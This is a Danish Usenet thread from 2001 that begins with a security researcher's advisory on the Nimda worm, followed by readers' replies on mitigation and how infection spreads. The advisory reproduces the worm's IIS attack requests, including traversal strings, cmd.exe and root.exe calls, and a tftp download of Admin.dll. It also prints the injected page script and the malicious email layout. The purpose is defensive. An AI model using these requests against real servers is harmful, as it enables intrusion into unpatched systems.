---

Navn: W32.Nimda.worm
Risiko: HØJ
Oprindelse: ?

W32.Nimda.worm er en høj risiko virus der spreder sig ved at udnytte en
sårbarhed i Outlook/IE (IFrame ) og adskillige andre som omfatter IIS. Denne
orm er krydsinficerende og udnytter stort set samtlige kendte sårbarheder,
som kan afvikle (remotely) kode på Microsoft IIS 4.0 og 5.0 (den laver alle
tænke GET kommandoer). Derudover spreder den sig fra inficerede hjemmesider
via Iframe sårbarheden, som tillader at kode afvikles automatisk uden
interaktion fra brugeren hvis maskinen ikke er opdateret eller understøtter
active scripting. Ormen tilføjer følgende streng til hjemmesider som
kompromitteres: "<html><script
language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>". Vi tæller allerede nu
adskillige hundrede danske hjemmesider.

Inficerede PC'ere og servere scanner efter infektion efter andre systemer
der kan infiltreres ved at udnytte gamle og nye sårbarheder. Her findes en
liste over de kald som ormen laver mod andre hosts i håb om at finde en
sårbar IIS-server.

tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..

Ormen indeholder teksten: "Concept Virus(CV) V.5, Copyright(C)2001
R.P.China". Det er højest sandsynligt, at den udspringer fra andre kilder
end den indlysende signatur.

Fra private PC'ere sender den sig selv videre til samtlige fortegnelser i
Outlooks adressekartotek ligesom den spreder sig via Netværk shares. Det
sker via SMB/CIFS som "C$" hvor den tilføjer en Guest konto til den lokale
administrator gruppe. På hver enkelt delt mappe den finder droppes følgende
filer: sample.nws, sample.eml, desktop.eml, desktop.nws.

Den dropper derudover mindst 4 filer i mappen:
(root)\Program Files\Common Files\msadc\
root.exe, TFTP129.exe, TFTP68.exe, TFTP192.exe.

Ormen syntes, at være primært bærende via email hvor den automatisk afvikles
hvis den vises i "preview pane" i Outlook/OE på en maskine som ikke er
opdateret med patch fra Microsoft..En inficeret email vil (den kan også være
blank i emne og indhold men vil altid anvende samme filnavn) ankomme med
følgende header:

Emne:
Xdesktopdesktopdesktopdesktopsamplesampledesktopsamplesamplesamplesampledesk
topdesktopsamplesampledesktopsamplesampledesktopdesktopsamplesamplesample
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

For at udgå at blive inficeret af denne orm kan man deaktivere aktive
scripting. Det kan gøres på følgende måde:

Højreklik på IE ikonet, vælg egenskaber, klik på fanebladet sikkerhed og
herunder brugerdefineret niveau. Gå ned på listen og deaktiver aktive
scripting.
Alle som administrerer en IIS server skal snarest opdatere med en samling af
patches, som er frigivet af Microsoft og som kan hentes på følgende adresse:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp

Yderligere informationer om den sårbarhed, som ormen anvender til at sprede
sig via email og fra kompromitterede hjemmesider kan findes hos Georgi
Guninski på adressen: http://www.guninski.com/frame2-desc.html

Med venlig hilsen / Best regards
Peter Kruse
Security- and virusresearch
Telia Telecom / Telia Security Group
Søren Frichsvej 34C - DK 8230 Åbyhøj

---

Peter Kruse skrev:

>Ormen indeholder teksten: "Concept Virus(CV) V.5, Copyright(C)2001
>R.P.China". Det er højest sandsynligt, at den udspringer fra andre kilder
>end den indlysende signatur.

Der var én i en gruppe der bemærkede at den er sluppet fri
rimelig præcist en uge efter angrebet på de to tårne.

--
Bertel
http://lundhansen.dk/bertel/   FIDUSO: http://fiduso.dk/

---

Bertel Lund Hansen <nospamto@lundhansen.dk> writes:

> Der var én i en gruppe der bemærkede at den er sluppet fri
> rimelig præcist en uge efter angrebet på de to tårne.

Samme person ville nok have sagt det samme hvis den var sluppet ud
rimeligt præcist 42 dage efter, eller et andet "magiskt" tal.
Alting sker rimeligt præcist et antal dage efter noget andet :)
/L
--
Lasse Reichstein Nielsen - lrn@daimi.au.dk
This message may be reproduced freely for non commercial purposes.
"... but where do you want to go tomorrow?"

---

Peter Kruse wrote:

> Navn: W32.Nimda.worm

Så vidt jeg læser dette, så vil et helt firma være inficeret, bare een
medarbejder ikke har fået opdateret sin maskine og modtager ormen/virussen
pr email. Er det rigtigt ? I så fald er den rimeligt led, må man sige.

Den er også temmeligt aktiv: På bare en 4-5 timer har den allerede over-
gået CodeRed II, da den var værst.

-Claus

---

"Peter Kruse" skrev

> Navn: W32.Nimda.worm

Ormen kan tages med MS værktøjet UrlScan (ISAPI filter):

<URL: http://www.microsoft.com/technet/security/urlscan.asp >

Det er en vældig god ide, at læse hvad der står i den medfølgende
tekst-fil og de afsluttende bemærkninger under installationen (så man
ved hvor tekstfilen kan findes).

BEMÆRK at webservicen skal genstartes, det sker dog automatisk, for
at indlæse ISAPI filteret.

Der er temmelig heftig aktivitet, på 10 minutter lavede den en 20 KB
logfil.

> readme.eml

Bemærk at *.eml er Outlook Express 5 format, når man gemmer en email
og *.nws er formatet når man gemmer et indlæg fra en nyhedsgruppe.
Disse formater benyttes for at omgå diverse sikkerhedsindstillinger i
Internet Explorer.

Yderligere oplysninger kan findes bl.a. her:

<URL: http://www.cert.org/current/current_activity.html#port80 >
<URL: http://www.kb.cert.org/vuls/id/111677 >

Med venlig hilsen

Peder

---

Peder Vendelbo Mikkelsen wrote:
>
> > readme.eml
>
> Bemærk at *.eml er Outlook Express 5 format, når man gemmer en email
> og *.nws er formatet når man gemmer et indlæg fra en nyhedsgruppe.
> Disse formater benyttes for at omgå diverse sikkerhedsindstillinger i
> Internet Explorer.
>
Jeg har for en gangs skyld måttet tage yderligere beskyttelse i
brug netop fordi tidlige rapporter antyder at ormen kan inficere
via Outlook, selvom man har den sat til at være paranoid og
spørge pænt før den åbner attachments.
Så nu kigger min mailserver på attachments og hvis den finder en
readme.exe så fjerner den alle atachments og sender mig en
besked om den har gjort det.

At der så (endnu) ikke er nogen som har prøvet at sende mig
en Nimda orm via email endnu er så hvad det er.

I forvejen fanger min internet udbyder web delen af det,
så min OmniHTTPd server får ikke engang lov til at sige
404 not found

--
John Hinge - shayera / .sPOOn.
On usenet I represent no one but myself.
"Buffy I love you...... Oh God No!" Spike, Buffy tVs
http://www.spoon-demogroup.net

---

On Tue, 18 Sep 2001 19:58:02 +0200, "Peter Kruse" <Peter.kruse@it.dk>
wrote:

> Derudover spreder den sig fra inficerede hjemmesider
>via Iframe sårbarheden, som tillader at kode afvikles automatisk uden
>interaktion fra brugeren hvis maskinen ikke er opdateret eller understøtter
>active scripting. Ormen tilføjer følgende streng til hjemmesider som
>kompromitteres: "<html><script
>language="JavaScript">window.open("readme.eml", null,
>"resizable=no,top=6000,left=6000")</script></html>". Vi tæller allerede nu
>adskillige hundrede danske hjemmesider.

Ved godt jeg er dum, men håber at I kan hjælpe mig med at blive
klogere.

Hvordan bliver hjemmesiderne inficerede i første omgang?

--
Mvh.
H. Olesen
Ved mail, fjern ordet "fjern" fra min email adresse

---

H Olesen <helle@fjernhavesiden.dk> wrote:
> Hvordan bliver hjemmesiderne inficerede i første omgang?

Nimba benytter sig af fejl i Microsoft's Internet Information Server. Fejl
som har vaeret kendte i et stykke tid.

Jeg gad vide hvor mange orme der skal til foer folk patcher deres maskiner
hver gang en sikkerhedsfejl bliver fundet -- og hvor lang tid der gaar foer
folk bliver dovne igen.

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.area51.dk/

---

On Wed, 19 Sep 2001 16:11:54 +0200, Alex Holst <a@area51.dk> wrote:

>H Olesen <helle@fjernhavesiden.dk> wrote:
>> Hvordan bliver hjemmesiderne inficerede i første omgang?
>
>Nimba benytter sig af fejl i Microsoft's Internet Information Server. Fejl
>som har vaeret kendte i et stykke tid.

Hmmm, jeg forstår det stadig ikke. Vil det sige at den går på serveren
som hjemmesiden ligger på og derfra ud til hjemmesiderne?

--
Mvh.
H. Olesen
Ved mail, fjern ordet "fjern" fra min email adresse

---

"H. Olesen" <helle@fjernhavesiden.dk> skrev i en meddelelse
news:q6ahqtogmod0ok4lnp20v4r84mnkf0d8ij@4ax.com...
> On Wed, 19 Sep 2001 16:11:54 +0200, Alex Holst <a@area51.dk> wrote:
>
> Hmmm, jeg forstår det stadig ikke. Vil det sige at den går på serveren
> som hjemmesiden ligger på og derfra ud til hjemmesiderne?
>
> H. Olesen

Det kan læses hos Symantec:



Læs hele historien:
http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

Med venlig hilsen
Aagaard
--
http://ditte-marie.dk - Vores dejlige baby
http://ditte-marie.dk/fotoalbum/index.php - Foto til kritik
http://ditte-marie.dk/billedkomprimering/ - Om jpeg kvalitet

---

Alex Holst skrev:

>Jeg gad vide hvor mange orme der skal til foer folk patcher deres maskiner
>hver gang en sikkerhedsfejl bliver fundet -- og hvor lang tid der gaar foer
>folk bliver dovne igen.

Mellem Happy.exe og Melissa gik der mindre end en måned. De var
dog rettet mod 'almindelige' systemer, men i dag er NT vel snart
også et almindeligt system.

--
Bertel
http://lundhansen.dk/bertel/   FIDUSO: http://fiduso.dk/

---

"Alex Holst" <a@area51.dk> wrote in message
news:slrn9qh9ta.2ahd.a@C-Tower.Area51.DK

> Jeg gad vide hvor mange orme der skal til foer folk patcher deres maskiner
> hver gang en sikkerhedsfejl bliver fundet -- og hvor lang tid der gaar
foer
> folk bliver dovne igen.

Når man er blevet ramt en gang eller man har lovet ledelsen man har styr på
sine servere.